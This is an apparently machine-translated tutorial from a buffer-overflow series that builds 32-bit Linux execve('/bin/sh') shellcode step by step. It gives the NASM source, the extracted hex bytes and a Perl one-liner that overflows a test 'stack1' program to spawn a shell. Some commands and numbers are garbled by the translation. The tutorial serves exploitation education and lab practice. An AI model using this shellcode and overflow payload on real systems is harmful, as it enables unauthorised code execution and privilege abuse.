How to write a local shellcode

Well, we're officially starting with a step-by-step process to write shellcode, combining the previous example program, to write a shellcode that opens a new shell.

Before writing, it is particularly useful to introduce some techniques for writing shellcode.

Shellcode Writing Skills How to avoid 0 bytesShellcode is usually caused by a string function such as strcpy/sprintf to cause overflow, so the shellcode injected through it cannot appear 0 bytes. But the actual code to run is 0, how to deal with it.
Use XOR instructions to clear 0 or CLD, e.g. xor eax, eax xor ebx, ebx xor ecx, ecx CLD; The directive zeroed out the edx
If you need to assign the value of EAX to 0x5, can not be directly written as mov eax, 0x05, because it will generate machine code mov eax, 0x00000005, there will be 0 padding. You can use this technique:
xor eax, EAX mov al, 0x05
The X86 provides a corresponding 16-bit and 8-register on the universal registers, which is used to avoid zero occurrences.
how to know the absolute addressAlthough in the previous attack example, shellcode stored the address is already known, but in different attacks, its address will change, then how we write shellcode does not depend on the change of the address and generalization of it. Then we need to borrow some relative jump instructions to get the absolute address.
The call command is a relative jump, but it will press an absolute address on the stack and then eject it to get an absolute address, such as:
jmp short get_string code:pop eax; This pops up the address of the next instruction in the call instruction stack, the address of the "Hello World" string.
Get_string:call code data:db ' Hello World ', 0x0a
The push command pushes the data onto the stack and then gets the value of the ESP, which is the absolute address of the data that was just pressed, such as:
Push 0x4b435546; 0x46, 0x55, 0x43, 0x4b respectively fuck characters of ASCII code mov eax, esp; Assigns the first address of the "fuck" string to the EAX, which can then be used for system call pass-through
Linux System calling conventionThe Linux system calls are in the kernel state with the int 0x80 instruction, the system call number passes through the EAX, the parameter is EBX, ECX, edx, EDI, ESI to pass.
Writing Shellcode
To write Shellcode under Linux, you can use GCC to assemble directly. s file to compile the link, generate the standard executable Elf file, but also can be directly tested, but it is not convenient to extract machine code is very inconvenient.
In order to facilitate the extraction of machine code, using the NASM compiler to generate the bin file, no other format data, convenient direct extraction.


We want to write the local shellcode, corresponding to the C language logic as follows

Char *argv[2];
Argv[0] = "/bin/sh"; ARGV[1] = NULL;
Execve ("/bin/sh", argv, NULL);
The process of translating into assembly language is as follows:
Press the "/bin/sh" string onto the stack, containing the string "
XOR edx, edx push edx push 0x68732f2f push 0x6e69622f
The string/bin//sh is pressed into the stack, and the number following the string is guaranteed to be 0, or the string terminator, by push edx. Note that the stack is grown from a high address to a low address, so you want to press it from the tail of the string.
mov ebx, esp
At this point the bottom of the stack is the start address of the word, which assigns the string address to the EBX (the first parameter of the system call)
Put the contents of the argv[2] array on the stack.
Push edx; Put argv[1] (value null) on the stack push ebx; Put Argv[0] ("/bin//sh") on the stack
At this point the ESP points to the space that corresponds to the start address of the argv[2] array structure
Since argv is the second parameter of the system call, it needs to be assigned to ECX
mov ecx, esp
xor eax, EAX, mov al, 0xb
At this point, EAX is 11 (System call number), EBX is the "/bin//sh" character symbol (the first parameter), ECX is the argv array (the second parameter), edx is null (the third parameter), then you can use int 0x80 to make system calls directly.
int 0x80

To put the above instructions together is the following assembly code:

BITS +

xor edx, edx
push edx push
0x68732f2f
push 0x6e69622f

mov ebx, esp

push edx
push EBX

mov ecx, esp

xor eax, eax
mov al, 0xb

int 0x80

Compile and generate machine code
Nasm-o shell2 Shell2.s

The generated shell2 file is bin data, all machine code, no format data, using Linux commands to convert to bash or perl input shellcode.
$ od-t X1 Shell2 | Sed-e ' s/[0-7]*//' | Sed-e ' s//\\x/g '
\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52
\x53\x89\xe1\x31\xc0\xb0\x0b\xcd
Then use the previous STACK1 program to test:
$ echo $$
2503
$ Perl-e ' printf "A" x48. "\x10\xd7\xff\xff". "\X31\XD2\X52\X68\X2F\X2F\X73\X68\X68\X2F\X62\X69\X6E\X89\XE3\X52\X53\X89\XE1\X31\XC0\XB0\X0B\XCD\X80" > Bad.txt;. /stack1
Data:aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa▒▒▒1▒rh//shh/bin▒▒rs▒▒1▒
̀▒▒▒
$ echo $$
4398
Description: The echo $$ command outputs the PID of the current shell (that is, bash or sh)
Before and after two different times, it means that after Shellcode executes, a new shell is opened. Also that Shellcode run successfully, test pass.
SummaryThis article describes techniques for writing Shellcode using assembly language, such as 0 numeric values, absolute addresses, and Linux system calling conventions. Finally, a local shellcode is successfully written.
============= Review This article series ============== buffer overflow attack practice analysis of buffer overflow attack principle shellcode
How to write a local shellcode
Writing Shellcode test Tools
Bypass address obfuscation with Ret2reg attacks
Bypassing data execution protection using the RET2LIBC attack method